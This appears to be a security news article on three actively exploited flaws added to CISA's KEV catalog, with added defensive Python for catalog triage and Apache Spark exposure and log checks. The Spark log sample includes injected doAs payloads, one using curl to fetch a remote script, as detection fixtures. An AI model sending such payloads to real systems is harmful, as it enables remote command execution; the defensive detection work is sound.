CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

Mar 08, 2023
Ravie Lakshmanan
Vulnerability / Cybersecurity

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.

The list of vulnerabilities is below:


  • CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability
  • CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability
  • CVE-2022-28810 (CVSS score: 6.8) - Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability
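Every KEV entry carries a remediation due date under BOD 22-01, so the practical first step after an addition like this is to cross-reference the catalog feed with your own inventory. The following is an added example, not code from the article or from CISA: it indexes a KEV catalog snapshot by CVE, matches it against a constructed inventory (scanner findings plus CMDB product names) and produces a worklist with overdue items first. The top-level structure and field names follow the public KEV JSON feed; the snapshot, the inventory, the hostnames and the due dates are constructed sample data, and the three-week due window used for the sample dates is an assumption.

```python
"""Triage a CISA KEV catalog snapshot against a local asset inventory.

Added example, not code from the article or from CISA.  The structure and
field names (vulnerabilities[], cveID, vendorProject, product, dateAdded,
dueDate, requiredAction) follow the public KEV JSON feed; the snapshot,
inventory, hostnames and dates below are constructed sample data rather than
a live download (assumption: a three-week due window for new entries).
"""
import json
from datetime import date

# Constructed KEV snapshot containing the three entries named in the article.
KEV_SNAPSHOT = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "sample",
    "dateReleased": "2023-03-07T00:00:00.0000Z",
    "count": 3,
    "vulnerabilities": [
        {"cveID": "CVE-2022-35914", "vendorProject": "Teclib", "product": "GLPI",
         "vulnerabilityName": "Teclib GLPI Remote Code Execution Vulnerability",
         "dateAdded": "2023-03-07", "dueDate": "2023-03-28",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2022-33891", "vendorProject": "Apache", "product": "Spark",
         "vulnerabilityName": "Apache Spark Command Injection Vulnerability",
         "dateAdded": "2023-03-07", "dueDate": "2023-03-28",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2022-28810", "vendorProject": "Zoho",
         "product": "ManageEngine ADSelfService Plus",
         "vulnerabilityName": "Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability",
         "dateAdded": "2023-03-07", "dueDate": "2023-03-28",
         "requiredAction": "Apply updates per vendor instructions."},
    ],
})

# Constructed inventory: what a CMDB plus a vulnerability scanner might emit.
# 'cves' is the scanner's finding list; 'product' is the CMDB's free-text name.
INVENTORY = [
    {"host": "glpi-01", "product": "GLPI 10.0.2", "cves": ["CVE-2022-35914"]},
    {"host": "spark-edge", "product": "Apache Spark 3.2.1", "cves": []},
    {"host": "adss-01", "product": "ManageEngine ADSelfService Plus", "cves": []},
    {"host": "web-03", "product": "nginx 1.22", "cves": ["CVE-2021-23017"]},
]


def load_kev(text):
    """Index a KEV catalog JSON document by CVE identifier."""
    catalog = json.loads(text)
    return {entry["cveID"]: entry for entry in catalog["vulnerabilities"]}


def kev_matches(kev, asset):
    """Return (entry, confirmed) pairs relevant to one asset.

    A confirmed match is a scanner finding whose CVE is in the catalog.  A
    candidate match is a catalog entry whose product name appears in the
    asset's CMDB product string; it still needs a version check, so it is
    reported with confirmed=False rather than dropped.
    """
    out = []
    for cve in asset["cves"]:
        if cve in kev:
            out.append((kev[cve], True))
    name = asset["product"].lower()
    for entry in kev.values():
        if entry["cveID"] in asset["cves"]:
            continue
        if entry["product"].lower() in name:
            out.append((entry, False))
    return out


def triage(kev, inventory, today):
    """Produce a remediation worklist sorted by KEV due date, overdue first."""
    rows = []
    for asset in inventory:
        for entry, confirmed in kev_matches(kev, asset):
            due = date.fromisoformat(entry["dueDate"])
            rows.append({
                "host": asset["host"],
                "cve": entry["cveID"],
                "due": due,
                "overdue": today > due,
                "confirmed": confirmed,
                "action": entry["requiredAction"],
            })
    rows.sort(key=lambda r: (not r["overdue"], r["due"], r["host"]))
    return rows


def demo(today_iso="2023-04-03"):
    """Run the triage on the constructed data as of the given ISO date."""
    return triage(load_kev(KEV_SNAPSHOT), INVENTORY, date.fromisoformat(today_iso))


if __name__ == "__main__":
    for row in demo():
        flag = "OVERDUE " if row["overdue"] else ""
        kind = "confirmed" if row["confirmed"] else "candidate"
        print(f"{flag}{row['host']:12} {row['cve']} due {row['due']} ({kind}): {row['action']}")
```

The candidate matches are deliberately kept on the worklist: a CMDB product name alone cannot tell a patched build from a vulnerable one, so the version check is left to the operator rather than silently assumed either way.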

The most critical of the three is CVE-2022-35914, a remote code execution vulnerability in htmLawed, a third-party HTML filtering library bundled with Teclib GLPI, an open source asset and IT management software package. The vulnerable code is the library's bundled test script, htmLawedTest.php, reachable under the application's vendor directory; the flaw affects GLPI through 10.0.2 and was fixed in 10.0.3.

The exact specifics of the attacks are unknown, but the Shadowserver Foundation noted in October 2022 that it was seeing exploitation attempts against its honeypots.

Since then, a cURL-based one-line proof of concept (PoC) has been made available on GitHub and a "mass" scanner has been advertised for sale, VulnCheck security researcher Jacob Baines said in December 2022.

Furthermore, data gathered by GreyNoise has revealed 40 malicious IP addresses from the U.S., the Netherlands, Hong Kong, Australia, and Bulgaria attempting to abuse the shortcoming.

The second flaw is an unauthenticated command injection vulnerability in Apache Spark that has been exploited by the Zerobot botnet to co-opt susceptible devices with the goal of carrying out distributed denial-of-service (DDoS) attacks. The bug sits in the Spark UI's ACL check, where an attacker-supplied user name ends up in a shell command; it is reachable only when spark.acls.enable is set to true (the default is false), and it was fixed in Spark 3.1.3, 3.2.2 and 3.3.0.
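Whether a given Spark deployment is actually reachable by this bug depends on two things: the version and the spark.acls.enable setting. The following added example (not code from the article or from the Apache Spark project) encodes the affected version ranges from the Apache advisory, parses a spark-defaults.conf fragment to decide exposure, and scans access-log lines for doAs values that are not plain user names, doAs being the query parameter through which the advisory's impersonation happens. The config fragments, the log lines, the IP addresses and the assumption that the UI sits behind a reverse proxy writing Common Log Format are all constructed for the example.

```python
"""Exposure check and log triage for CVE-2022-33891 (Apache Spark UI).

Added example, not code from the article or the Apache Spark project.  The
affected version ranges and the spark.acls.enable precondition come from the
Apache advisory for this CVE; the spark-defaults.conf fragments and the
access-log lines below are constructed, and Common Log Format from a reverse
proxy in front of the UI is an assumption about the deployment.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Inclusive version ranges the advisory lists as affected: 3.0.3 and earlier,
# 3.1.1 through 3.1.2, and 3.2.0 through 3.2.1 (fixed in 3.1.3, 3.2.2, 3.3.0).
AFFECTED_RANGES = [((0, 0, 0), (3, 0, 3)), ((3, 1, 1), (3, 1, 2)), ((3, 2, 0), (3, 2, 1))]

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def version_affected(version):
    """True if a Spark version string (e.g. '3.2.1' or '3.2.1-SNAPSHOT') is in an affected range."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Spark version: {version!r}")
    v = tuple(int(x) for x in m.groups())
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def parse_spark_conf(text):
    """Parse spark-defaults.conf: one 'key value' pair per line, '#' comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf[parts[0]] = parts[1].strip() if len(parts) == 2 else ""
    return conf


def exposed(version, conf):
    """Reachable only when ACLs are enabled; the Spark default is false."""
    acls_on = conf.get("spark.acls.enable", "false").strip().lower() == "true"
    return version_affected(version) and acls_on


# Constructed config fragments: the exposed setting beside the default one.
CONF_WITH_ACLS = """
# spark-defaults.conf (constructed sample)
spark.ui.port          4040
spark.acls.enable      true
spark.ui.view.acls     alice,bob
"""
CONF_WITHOUT_ACLS = """
spark.ui.port          4040
spark.acls.enable      false
"""

# A legitimate doAs value is a user name, so anything outside a conservative
# user-name alphabet (shell metacharacters, spaces, quotes) is worth a look.
SAFE_USER = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed reverse-proxy log lines in Common Log Format.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Mar/2023:10:15:01 +0000] "GET /?doAs=alice HTTP/1.1" 200 5120
10.0.0.9 - - [07/Mar/2023:10:15:07 +0000] "GET /jobs/ HTTP/1.1" 200 9001
198.51.100.23 - - [07/Mar/2023:10:16:42 +0000] "GET /?doAs=%60id%60 HTTP/1.1" 403 0
198.51.100.23 - - [07/Mar/2023:10:16:43 +0000] "GET /?doAs=x%3Bcurl+198.51.100.23%2Fs.sh HTTP/1.1" 403 0
"""


def suspicious_doas(lines):
    """Return (source IP, decoded doAs value) for requests whose doAs is not a plain user name."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get("doAs", []):
            if not SAFE_USER.match(value):
                hits.append((m.group("src"), value))
    return hits


if __name__ == "__main__":
    for ver in ("3.0.3", "3.1.2", "3.2.1", "3.2.2", "3.3.0"):
        print(ver, "affected" if version_affected(ver) else "not affected")
    print("exposed with ACLs:", exposed("3.2.1", parse_spark_conf(CONF_WITH_ACLS)))
    print("exposed without ACLs:", exposed("3.2.1", parse_spark_conf(CONF_WITHOUT_ACLS)))
    for src, val in suspicious_doas(SAMPLE_LOG.splitlines()):
        print(f"suspicious doAs from {src}: {val!r}")
```

A 403 in the log does not mean the attempt failed: the command runs inside the permission check, before the response status is decided, so treat any non-user-name doAs value against an exposed instance as a likely execution, not a blocked probe.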

Lastly, also added to the KEV catalog is a remote code execution flaw in Zoho ManageEngine ADSelfService Plus that was patched in April 2022.


"Zoho ManageEngine ADSelfService Plus contains an unspecified vulnerability allowing for remote code execution when performing a password change or reset," CISA said.

Cybersecurity company Rapid7, which discovered the bug, said it detected active exploitation attempts by threat actors to "execute arbitrary OS commands in order to gain persistence on the underlying system and attempt to pivot further into the environment."

The development comes as API security firm Wallarm said it has found ongoing exploit attempts of two VMware NSX Manager flaws (CVE-2021-39144, a remote code execution bug in the bundled XStream library, and CVE-2022-31678, an XML external entity issue) since December 2022 that could be leveraged to execute malicious code and siphon sensitive data.
